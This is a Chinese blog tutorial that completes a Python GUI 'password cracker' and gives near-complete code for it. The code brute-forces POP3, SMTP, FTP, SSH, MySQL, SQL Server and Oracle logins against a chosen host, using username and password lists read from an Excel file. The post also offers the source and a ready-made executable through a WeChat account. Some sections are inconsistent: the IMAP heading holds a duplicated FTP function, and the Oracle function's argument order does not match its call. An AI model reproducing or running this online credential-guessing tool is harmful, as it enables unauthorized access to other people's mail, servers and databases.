太实用了!自己动手写软件——我们的密码PJ器终于完成了
之前我们完成了密码破解工具的界面,今天我们来看看功能实现吧。
编码
提交——功能实现
首先我们先完成“提交”功能的实现,“提交”按钮的作用是将用户填写的服务器地址、服务器端口和协议类型信息存储起来,用于后面的密码验证。所以我们先定义了一个字典(因为oracle的数据库连接必须要实例名,所以我们新增了一个db_name)。
dic_list = {'server_ip':'','server_port':'','pro':'','db_name':""}
获取服务器地址和端口我们定义了一个回调函数gettext,将两个Entry对象传递过来后,直接使用一个get命令就可以将Entry中的内容取出来,同时我们添加了对IP和端口的合法性校验。
def gettext(x,y):
"""
获取输入框内容
:param x: 输入框对象——服务器IP
:param y: 输入框对象——服务器端口
:return:
"""
server_ip = x.get()
server_port = y.get()
#判断输入的IP和端口是否合法
if (not re.match("[a-zA-Z0-9][-a-zA-Z0-9]{0,62}(\.[a-zA-Z0-9][-a-zA-Z0-9]{0,62})+\.?",server_ip)):
tkinter.messagebox._show(title="IP输入不合法", message='请重新输入合法IP')
# elif not(re.match("^?:([1-6][0-9]{1,4})|([1-9][0-9]{0,3})$",server_port)):
elif not(re.match("^[1-9]$|(^[1-9][0-9]$)|(^[1-9][0-9][0-9]$)|(^[1-9][0-9][0-9][0-9]$)|(^[1-6][0-5][0-5][0-3][0-5]$)$",server_port)):
tkinter.messagebox._show(title="端口输入不合法", message='请重新输入合法端口')
else:
dic_list["server_port"] = server_port
dic_list["server_ip"] = server_ip
print(dic_list["server_ip"],dic_list["server_port"])
对于协议类型的读取,我们定义了一个回调函数get_select,同时我们对协议是否选择进行判断,若没有选择则提示重新选择协议。
def get_select(y,list_pro):
"""
获取列表的选择
:param y:列表框对象
:param list_pro:列表
"""
for i in range(0, len(list_pro)):
if y.selection_includes(i):
#补充dic_list字典中的协议字段内容
dic_list["pro"] = list_pro[i]
else:
pass
if dic_list["pro"]=="":
tkinter.messagebox._show(title="协议未选择", message='请重新破解协议')
elif dic_list["pro"]=='Oracle':
dic_list['db_name']=getInput("Oracle实例","请输入Oracle实例信息")
print(dic_list['db_name'])
同时我们添加了一个对oracle协议的判断,若选择oracle协议则需要弹出一个窗口填写数据库实例名称。我们新增了一个弹框输入的函数get_Input进行调用。
def getInput(title, message):
def return_callback(event):
print('quit...')
root.quit()
def close_callback():
tkinter.messagebox.showinfo('message', 'no click...')
root = tkinter.Tk(className=title)
root.wm_attributes('-topmost', 1)
screenwidth, screenheight = root.maxsize()
width = 300
height = 100
size = '%dx%d+%d+%d' % (width, height, (screenwidth - width) / 2, (screenheight - height) / 2)
root.geometry(size)
root.resizable(0, 0)
lable = tkinter.Label(root, height=2)
lable['text'] = message
lable.pack()
entry = tkinter.Entry(root)
entry.bind('<Return>', return_callback)
entry.pack()
entry.focus_set()
root.protocol("WM_DELETE_WINDOW", close_callback)
root.mainloop()
str = entry.get()
root.destroy()
return str
这样我们的“提交”按钮功能就全部完成了。接下来我们看看“开始破解”菜单按钮的功能。
开始破解——功能实现
我们定义了一个回调函数为mimapojie
首先会读取密码字典
然后是选择协议并执行破解动作
最后是展示破解结果
def mimapojie(server_ip,server_port,pro):
get_user_and_passwd('./test.xls', 0)
print_list = choice_protocol(server_ip, int(server_port), pro,dic_list['db_name'])
#展示破解结果
tkinter.messagebox._show(title='破解结果',message=dic_list['pro'],detail=print_list)
接下来我们依次看看这三个方面都是如何实现的。
读取密码字典
我们使用的是我们之前文章中使用的读取Excel表格的方式,我们直接将第一列的内容读取到user_list列表中,将第二列内容读取到password_list列表中。
def get_user_and_passwd(file_path, sheet_id):
"""
获取密码库中的用户名密码
:param file_path: 密码库的路径及文件名
:param sheet_id: 密码库中的sheet id
"""
read_excel = ReadAndWriteExcel.OpenExcel(file_name=file_path, sheet_id=sheet_id)
rows = read_excel.get_lines()
global user_list
global password_list
for i in range(0, rows):
if read_excel.get_value(i, 0):
user_list.append(read_excel.get_value(i, 0))
if read_excel.get_value(i, 1):
password_list.append(read_excel.get_value(i, 1))
选择协议并执行破解动作
我们定义了一个选择协议函数,根据获取到的选择协议字段执行不同的破解函数。
def choice_protocol(server_ip,server_port, pro,db_name):
"""
选择需要破解的协议
:param server_ip:需要破解的服务器IP
:param server_port:需要破解的服务器端口
:param pro: 需要破解的协议
:param db_name: oracle数据库的实例名
"""
if pro == "POP3":
attempt_pop(server_ip, server_port)
elif pro == "IMAP":
print('this is a test')
attempt_imap(server_ip, server_port)
elif pro == "SMTP":
attempt_smtp(server_ip, server_port)
elif pro == "FTP":
attempt_ftp(server_ip, server_port)
elif pro == "SSH":
attempt_ssh(server_ip, server_port)
elif pro == 'MySql':
attempt_mysql(server_ip, server_port)
elif pro == "SQL Server":
attempt_mssql(server_ip, server_port)
elif pro == "Oracle":
attempt_oracle(server_ip, server_port,db_name)
return print_list
POP3协议的破解函数
def attempt_pop(server_ip, server_port):
"""
破解POP3协议的用户名密码
:param server_ip: 破解的服务器IP
:param server_port: 破解的服务器端口
"""
print("=======破解POP3协议========")
print_list.clear()
for i in range(0, len(user_list)):
for j in range(0, len(password_list)):
try:
pop3_server = poplib.POP3(host=server_ip,port=server_port)
pop3_server.user(user_list[i])
pop3_server.pass_(password_list[j])
#获取邮件列表,用于判断是否登录成功
pop3_server.list()
print_list.append("用户名:%s,密码:%s登录成功\n" % (user_list[i], password_list[j]))
except:
pass
if not print_list:
print_list.append("密码破解失败")
IMAP协议的破解函数
def attempt_ftp(server_ip,port=21):
"""
破解FTP协议的用户名密码
:param server_ip: 破解的服务器IP
:param port: 破解的服务器端口,默认为21
"""
ftp = FTP()
ftp.connect(server_ip, port)
global print_list
print_list.clear()
for i in range(0, len(user_list)):
for j in range(0, len(password_list)):
try:
ftp.login(user_list[i], password_list[j])
ftp.quit()
print_list.append("用户名:%s,密码:%s登录成功\n" % (user_list[i], password_list[j]))
except:
pass
if not print_list:
print_list.append("密码破解失败")
SMTP协议的破解函数
def attempt_smtp(mail_host, port=25):
"""
破解SMTP协议的用户名密码
:param mail_host: 破解的服务器IP
:param show_flag: 标志位,True代表展示破解失败的用户名密码,False代表仅展示破解成功的用户名密码
:param port: 破解服务器的端口,默认为25
"""
print("=======破解SMTP协议========")
global user_list
global password_list
print_list.clear()
for i in range(0, len(user_list)):
for j in range(0, len(password_list)):
try:
smtpObj = smtplib.SMTP(timeout=3)
smtpObj.set_debuglevel(0)
smtpObj.connect(mail_host, port) # 25 为 SMTP 端口号
smtpObj.login(user_list[i], password_list[j])
print_list.append("用户名:%s,密码:%s登录成功\n" % (user_list[i], password_list[j]))
except Exception as e:
print(e)
pass
if not print_list:
print_list.append("密码破解失败")
FTP协议的破解函数
def attempt_ftp(server_ip,port=21):
"""
破解FTP协议的用户名密码
:param server_ip: 破解的服务器IP
:param port: 破解的服务器端口,默认为21
"""
ftp = FTP()
ftp.connect(server_ip, port)
global print_list
print_list.clear()
for i in range(0, len(user_list)):
for j in range(0, len(password_list)):
try:
ftp.login(user_list[i], password_list[j])
ftp.quit()
print_list.append("用户名:%s,密码:%s登录成功\n" % (user_list[i], password_list[j]))
except:
pass
if not print_list:
print_list.append("密码破解失败")
SSH协议的破解函数
def attempt_ssh(server_ip, port=22):
"""
破解SSH协议的用户名密码
:param server_ip: 破解的服务器IP
:param port: 破解的服务器端口,默认为22
"""
print("=======破解SSH协议========")
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
global user_list
global password_list
print_list.clear()
for i in range(0, len(user_list)):
for j in range(0, len(password_list)):
try:
ssh.connect(hostname=server_ip, port=port, username=user_list[i], password=password_list[j])
print_list.append("用户名:%s,密码:%s登录成功\n" % (user_list[i], password_list[j]))
except:
pass
if not print_list:
print_list.append("密码破解失败")
MySQL协议的破解函数
def attempt_mysql(server_ip, server_port=3306,db_name='mysql'):
"""
破解MySQL协议的用户名密码
:param server_ip: 破解的服务器IP
:param show_flag: 标志位,True代表展示破解失败的用户名密码,False代表仅展示破解成功的用户名密码
"""
print("=======破解MYSQL协议========")
global user_list
global password_list
print_list.clear()
for i in range(0, len(user_list)):
for j in range(0, len(password_list)):
try:
# pymysql.connect(host=server_ip,port=server_port,user=user_list[i],passwd=password_list[j],db=db_name)
db = pymysql.connect(server_ip, user_list[i], password_list[j])
db.close()
print_list.append("用户名:%s,密码:%s登录成功\n" % (user_list[i], password_list[j]))
except:
pass
if not print_list:
print_list.append("密码破解失败")
SQL server协议的破解函数
def attempt_mssql(server_ip, server_port):
"""
破解SQL server协议的用户名密码
:param server_ip: 破解的服务器IP
:param server_port: 破解的服务器端口
"""
print("=======破解SQL Server协议========")
global user_list
global password_list
print_list.clear()
for i in range(0, len(user_list)):
for j in range(0, len(password_list)):
try:
db = pymssql.connect(server_ip,user_list[i],password_list[j])
db.close()
# print("用户名:%s,密码:%s登录成功" % (user_list[i], password_list[j]))
print_list.append("用户名:%s,密码:%s登录成功\n" % (user_list[i], password_list[j]))
except:
pass
if not print_list:
print_list.append("密码破解失败")
Oracle协议的破解函数
def attempt_oracle(server_ip,db_name, port=1521 ):
"""
破解Oracle协议的用户名密码
:param server_ip: 破解的服务器IP
:param show_flag: 标志位,True代表展示破解失败的用户名密码,False代表仅展示破解成功的用户名密码
:param port: 破解的服务器端口,默认为1521
"""
print("=======破解Oracle协议========")
global user_list
global password_list
print_list.clear()
for i in range(0, len(user_list)):
for j in range(0, len(password_list)):
try:
cx_Oracle.connect(user_list[i]+'/'+password_list[j]+'@'+server_ip+':'+str(port)+'/'+db_name)
# print("用户名:%s,密码:%s登录成功" % (user_list[i], password_list[j]))
print_list.append("用户名:%s,密码:%s登录成功\n" % (user_list[i], password_list[j]))
except Exception as e:
pass
if not print_list:
print_list.append("密码破解失败")
实现效果
这样我们的软件就实现了,我们看一下ftp协议和Oracle协议的破解效果吧。
FTP协议
页面填写
破解结果
Oracle协议
破解界面配置同ftp界面,点击“提交”后会弹出输入实例名的窗口,输入实例名并回车即可。
因为菜鸟小白没有搭建Oracle服务器所以破解失败的结果如下:
程序获取
老规矩,关注公众号“菜鸟小白的学习分享”。
- 回复“密码破解源码”即可获得源码下载链接
- 回复“密码破解可执行程序”即可获得工具软件
太实用了!自己动手写软件——我们的密码PJ器终于完成了的更多相关文章
- 太实用了!自己动手写软件——GUI编程
这几天我有一个想法就是将我之前做测试写的一些协议脚本(如:ssh.FTP.SMTP.MySQL.Oracle等)综合在一起做一个密码PJ器,这么多的协议放在一起,每个协议都有自己特殊的参数,如果还是和 ...
- 太实用了!自己动手写软件——SSH、FTP和SQL server的密码破解
我们的密码破解工具一共分为如下六个部分,前面四个部分我们都有在之前的文章中介绍过了 用户图形界面——GUI编程 密码字典获取——Excel文件读取 数据库类——MySQL.Oracle和SQL ser ...
- 自己动手写一个编译器Tiny语言解析器实现
然后,上一篇文章简介Tiny词法分析,实现语言.本文将介绍Tiny的语法分析器的实现. 1 Tiny语言的语法 下图是Tiny在BNF中的文法. 文法的定义能够看出.INNY语言有以下特点: 1 程序 ...
- 【原创】自己动手写工具----XSmartNote [Beta 3.0]
一.前面的话 在动笔之前,一直很纠结到底要不要继续完成这个工具,因为上次给它码代码还是一年多之前的事情,参考自己动手写工具----XSmartNote [Beta 2.0],这篇博文里,很多园友提出了 ...
- 【原创】自己动手写工具----XSmartNote [Beta 2.0]
一.前面的话 在上一篇自己动手写工具----XSmartNote中,我简单介绍了这个小玩意儿的大致界面和要实现的功能,看了一下园子里的评论,评价褒贬不一,有人说“现在那么多云笔记的工具”,“极简版ev ...
- 【转】自己动手写SC语言编译器
自序 编译原理与技术的一整套理论在整个计算机科学领域占有相当重要的地位,学习它对程序设计人员有很大的帮助.我们考究历史会发现那些人人称颂的程序设 计大师都是编译领域的高手,像写出BASIC语言的BIL ...
- 自己动手写 ASP.NET MVC 分页 part1
学习编程也有一年半载了,从来没有自己动手写过东西,都是利用搜索软件找代码,最近偶发感慨,难道真的继续做码农??? 突发奇想是不是该自己动手写点东西,可是算法.逻辑思维都太弱了,只能copy网上的代码, ...
- 自己动手写了第三阶段的处理器——教学OpenMIPS处理器蓝图
我们会继续上传新书<自己动手写处理器>(未公布).今天是第十条.我每星期试试4 从本章開始将一步一步地实现教学版OpenMIPS处理器.本章给出了教学版OpenMIPS的系统蓝图,首先介绍 ...
- 自己动手写CPU之第四阶段(3)——MIPS编译环境的建立
将陆续上传本人写的新书<自己动手写CPU>(尚未出版).今天是第13篇.我尽量每周四篇 4.4 MIPS编译环境的建立 OpenMIPS处理器在设计的时候就计划与MIPS32指令集架构兼容 ...
随机推荐
- Python的多继承问题-MRO和C3算法
大部分内容转载自C3 线性化算法与 MRO 理解Python中的多继承 Python 中的方法解析顺序(Method Resolution Order, MRO)定义了多继承存在时 Python 解释 ...
- 发布Nuget包时遇到都意外
准备好工具和发布教程.(这些网上都有,我就不说了,就说说我遇到都意外.) 在发布包都过程中,我给我都dll命名为Common.不知道是不是这个原因导致的我包发布上去后,程序对其引用时居然没主动引用进程 ...
- Redis高级特性介绍以及实例分析
Redis基础类型回顾 转自:http://www.jianshu.com/p/af7043e6c8f9 String Redis中最基本,也是最简单的数据类型.注意,VALUE既可以是简单的Stri ...
- LeetCode64. 最小路径和
这题和62题以及63题类似,只不过dp数组的状态表示变了,这里dp数组不再表示方案数,而是到当前格子的最小路径和.可以发现:要到达第i行第j列的格子,只有从第i - 1行第j列的格子或第i行第j - ...
- Spring中使用注解时启用<context:component-scan/>
在spring中使用注解方式时需要在spring配置文件中配置组件扫描器:http://blog.csdn.net/j080624/article/details/56277315 <conte ...
- SpringCloud之OpenFeign
SpringCloud之openFeign Spring Cloud的子项目之一,Spring Cloud OpenFeign以将OpenFeign集成到Spring Boot应用中的方式,为微服务架 ...
- 为什么是link-visited-hover-active原理这样的特殊
前言 通常我们在设置链接的一些伪类(link,visited,hover,active)样式时,要让不同的状态显示正确的样式,我们需要按一定的顺序设置这些伪类的样式.这里我就按css2规范中推荐的顺序 ...
- Redis四大模式之主从配置
Redis工作模式主要有单机模式.主从模式(slave).哨兵模式(sentinel).集群模式(cluster)这四种,本文主要讲解一下主从模式的部署方式. 我是windows单机进行的这套搭建操作 ...
- day53 html收尾
目录 一.解决浮动带来的影响 二.溢出属性 三.定位 四.验证浮动和定位是否脱离文档流 五.z-index模态框 六.透明度opacity 七.js简介 一.解决浮动带来的影响 块级标签内的浮动如果该 ...
- 普通平衡树学习笔记之Splay算法
前言 今天不容易有一天的自由学习时间,当然要用来"学习".在此记录一下今天学到的最基础的平衡树. 定义 平衡树是二叉搜索树和堆合并构成的数据结构,它是一 棵空树或它的左右两个子树的 ...